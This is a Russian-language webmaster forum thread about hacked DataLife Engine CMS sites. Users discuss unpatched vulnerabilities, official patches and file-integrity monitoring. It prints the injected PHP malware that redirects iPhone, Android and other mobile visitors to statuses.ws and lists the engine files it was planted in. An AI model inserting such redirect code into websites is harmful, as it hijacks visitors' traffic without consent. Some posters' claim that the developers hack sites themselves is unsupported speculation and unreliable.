Вирус на сайте cms dle

в каком именно файле? давным давно уже был официальный патч

смысл? таких ботов сотни регистрируются

Этот юзер есть у всех кого взломали и вставили этот код

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");



if ($iphone || $android || $palmpre || $ipod || $berry === true) { 

    header('Location: http://statuses.ws/');

}

в фалы

engine\data\config.php

engine\data\dbconfig.php

engine\engine.php

engine\init.php

\index.php

Так же встречается этот юзер на не взломанных сайтах. Только непонятно почему он зарегался и не взломал. Что-то у него не получилось.

разные могут быть

например, самое распространенное, о чем писали на оф. форуме поддержки - при входе в админку - сообщение о том, что некоторые htaccess файлы имеют неправильные права (возможность записи).

кроме того, в мобильной версии ставится жаваскрипт-редирект на statuses.ws (может быть сейчас уже и на другой сайт, но изначально на него лился траф)

причем человек, который шеллом менял файлы шаблона, одновременно тестил со своей мобилы как "работают" его изменения. я это проверял по логам.

хочу также отметить, что на самом деле очень хорошо, что чувак только шаблоны поменял и пару JS файлов, а не похерил ничего в принципе)))) добрый хацкер, ага.

ну и хорошо иметь антивирус, как минимум штатный, лучше от Zeos, в идеале какую то автономную систему, которая палит изменения в файлах и репорты шлет на мыло.

я тоже очень хочу кнопку бабло, чтобы ничего делать не надо было)))

Я по поводу ОФФ, патча: http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Тут надо заменить файл templates.class.php

Но, почему нету тут строчки

if( ! defined( 'DATALIFEENGINE' ) ) {die( "<b>Hacking attempt!</b>" );}

???

Так же в некоторых файлах в папке \engine\classes есть этот код защиты, а в некоторых нету.

Почему?

Врядли разработчики забыли про это :)

Мне кажется, что разработчики сами ламают сайты, что бы хоть как то возместить "ущерб". Я про то, что 80% где то пользуются НУЛЛами, а это могли бы быть их деньги :)

Я по поводу ОФФ, патча: http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Тут надо заменить файл templates.class.php

Но, почему нету тут строчки

if( ! defined( 'DATALIFEENGINE' ) ) {die( "<b>Hacking attempt!</b>" );}

???

Так же в некоторых файлах в папке \engine\classes есть этот код защиты, а в некоторых нету.

Почему?

Врядли разработчики забыли про это :)

Мне кажется, что разработчики сами ламают сайты, что бы хоть как то возместить "ущерб". Я про то, что 80% где то пользуются НУЛЛами, а это могли бы быть их деньги :)

Раз давным-давно, то там и смотрите. И, пожалуйста, не говорите, если не проверяли и "не в теме".

Анализирую код только для обеспечения безопасности своих и клиентских сайтов - не более того.

Вы, наверное, крутой кодер (куда там мне), вот и напишите security-модуль а-ля как делал когда-то kzpromo. А, если ещё и бесплатно выложите и его не обойдут - то цены Вам, как программисту не будет.

бред бредовый.

нет, я обычные вебмастер, который изредка заходит на оффсайт и смотрит новости. а вот вы, судя по теме

/ru/forum/comment/11333590

действительно крутой кодер, выдающий давно реализованные вещи за свое ;)

кроме того, я специально уточнил в каком файле не проверяется?

раньше это касалось постраничной навигации. а вы о чем сейчас?

Так взламывают не только нулы но и лицензионные версии. да и разрабам от этих взломов могут быть только убытки, Многие просто перейдёт на другие движки и не будут покупать дле.

На сколько я заметил есть как минимум 2 дыры, которыми в данный момент пользуются взломщики.

Одну дыру (ту через которую правили файлы шаблона) разрабы прикрыли патчем2.

Вторая дыра (та через которую вставляют код в файлы движка с редиректом с мобильных устройств) на данный момент не прикрыта.

я там не писал, что это моё, ок? Если вы там найдёте хоть строчку, где я сказал - это мой код или упомянул себя, как автора - снимаю шляпу.

Насчёт багов - мне на почту приходит информация. Если Вы смотрите на новости, то не могли не заметить, что там ничего нет о вышеуказанном баге. Более не намерен Вам ничего доказывать - не вижу резона. Каждый остался при своём мнении.

asmakovec2,

3, насколько мне известно:) Но мне лучше не верить, т.к все уязвимости уже пофиксили, и исправления опубликованы на офф.сайте, как же я могу не поверить многоуважаемому se_noob.

Ломают не только нуллы, но и лицухи. Вряд ли это разработчики.

P.S. Пока писал сообщение, asmakovec2 тоже самое сказал.